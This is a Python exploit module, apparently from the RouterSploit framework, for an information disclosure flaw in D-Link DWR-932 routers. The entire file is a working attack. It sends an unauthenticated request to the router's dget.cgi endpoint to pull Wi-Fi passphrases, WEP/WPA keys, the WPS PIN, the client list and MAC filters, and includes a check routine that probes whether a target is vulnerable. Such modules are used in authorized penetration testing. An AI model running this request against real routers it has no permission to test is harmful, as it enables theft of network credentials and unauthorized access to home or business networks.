import requests
import json

from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
    print_table,
    print_status,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for D-Link DWR-932 Information Disclosure vulnerability.
    If the target is vulnerable it allows to read credentials for administrator."
    """
    __info__ = {
        'name': 'D-Link DWR-932 Info Disclosure',
        'description': 'Module explois information disclosure vulnerability in D-Link DWR-932 devices. It is possible to retrieve sensitive information such as credentials.',
        'authors': [
            'Saeed reza Zamanian'  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'https://www.exploit-db.com/exploits/39581/',
        ],
        'targets': [
            'D-Link DWR-932',
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
        url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))

        try:
            r = requests.get(url)
            res = r.text
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        try:
            data = json.loads(res)
            print_status("Decoding JSON value")
        except ValueError:
            print_error("Response is not valid JSON")
            return

        if len(data):
            print_success("Exploit success")

        rows = []
        for key in data.keys():
            if len(data[key]) > 0:
                rows.append((key, data[key]))

        headers = ("Parameter", "Value")
        print_table(headers, *rows)

    def check(self):
        url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))

        try:
            r = requests.get(url)
            res = r.text
        except:
            return None  # could not be verified

        if 'wifi_AP1_ssid' in res:
            return True  # target is vulnerable

        return False  # target not vulnerable
